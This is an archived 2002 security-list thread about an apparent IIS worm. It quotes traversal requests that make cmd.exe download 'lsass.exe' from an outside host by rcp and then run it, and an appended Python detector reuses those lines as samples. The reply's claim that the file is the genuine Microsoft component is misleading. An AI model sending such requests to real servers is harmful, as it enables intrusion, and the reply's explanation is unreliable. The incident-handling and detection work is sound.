Re: new IIS worm? (rcp lsass.exe)

From: Michael Thompson (mikeat_private)
Date: Sun Sep 22 2002 - 17:25:30 PDT


    Hello Christian,
    
    On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my
    TimeZone) you wrote:
    
    CM> hi,
    
    CM> since about a week I notice attempts to exploit vulnerable IIS installations
    CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature)
    CM> that seems to try and load an "lsass.exe" file via rcp.
    
    CM> As a search of google and securityfocus turned up nothing, I'll throw in 
    CM> what I gathered so far and ask if anybody can identify this: (it seems
    CM> the affected customer's systems weren't vulnerable, so I don't know what
    CM> the worm's further actions are).
    
    CM> The first part is a SYN scan for port 80, with the source port set to 80, 
    CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over
    CM> the 3rd IP address octet first, and the 4th later, probably to make the scan
    CM> on the single /24 slower and less noticeable (in the case I've seen, it
    CM> has some 30 seconds between packets to consecutive addresses).
    
    CM> Then it seems to go after the web servers, sending the following:
    
    CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..
    
    CM> and
    
    CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
    
    CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but 
    CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks.
    
    CM> Yes, and the IP address doing the scanning + exploit attempts is different
    CM> from the one which provides lsass.exe; the scanning machine seems to be
    CM> a Solaris 2.7 default install, the rcp-server seems to be Solaris 2.8.
    
    CM> regards,
    
    CM> cm.
    
    
    lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is
    responsible for managing secure storage in those environments.
    
    -- 
    Best regards,
     Michael
    
    http://wwww.thompsonmike.co.uk/
    PGP KeyID := 0x3CC985FA
      
    
    I just can't put it down. 
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
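The two request lines Christian quotes are the classic IIS directory-traversal form (encoded backslashes stepping out of /scripts/ into winnt/system32/cmd.exe), with the command in the query string. The following is an added detection example, not code from the thread or from Snort: it decodes request lines the way IIS did (including the double-decode case the "multiple decode" signature refers to), flags traversal to cmd.exe, and notes when the command fetches a file with rcp. The sample request lines are constructed for the example, modelled on the ones quoted above plus benign traffic; it assumes your web logs preserve the raw request line.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample request lines: the first two mirror the ones quoted in
# the thread, the third is a double-encoded variant, the rest are benign.
SAMPLE_REQUESTS = [
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0",
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0",
    "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /images/logo.gif HTTP/1.0",
]

# ".." as a whole path segment, after decoding and normalising separators.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
CMD_EXEC = re.compile(r"/cmd\.exe$", re.IGNORECASE)


def decode_path(path: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times (IIS's flaw decoded twice), so that
    %5c and %255c both become a backslash; then treat '\\' as a separator."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def classify(request_line: str) -> dict:
    """Return a verdict for one raw HTTP request line."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return {"suspicious": False, "reasons": ["malformed"], "decoded": None, "command": None}
    _method, target, _version = parts
    raw_path, _, query = target.partition("?")

    decoded = decode_path(raw_path)
    once = unquote(raw_path)
    reasons = []
    if TRAVERSAL.search(decoded):
        reasons.append("traversal")
    if CMD_EXEC.search(decoded):
        reasons.append("cmd.exe")
    if unquote(once) != once:
        reasons.append("double-encoded")  # only a second decode exposed the traversal

    # IIS passed the query string to cmd.exe as its argument list, '+' meaning space.
    command = unquote_plus(query) if query else None
    if command and "rcp" in command.split():
        reasons.append("rcp")  # command fetches a file from a remote host

    return {
        "suspicious": bool(reasons),
        "reasons": reasons,
        "decoded": decoded,
        "command": command,
    }


def scan(lines) -> list:
    """Return (line, verdict) pairs for every suspicious request line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict["suspicious"]:
            hits.append((line, verdict))
    return hits


if __name__ == "__main__":
    for line, verdict in scan(SAMPLE_REQUESTS):
        print(", ".join(verdict["reasons"]), "->", verdict["decoded"], "|", verdict["command"])
```

The decode loop stops as soon as a pass changes nothing, so plain paths are decoded once and only genuinely double-encoded paths pick up the "double-encoded" tag; matching on the decoded, separator-normalised path is what lets one rule cover %5c, %255c and literal slashes alike.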
    



    This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:03:57 PDT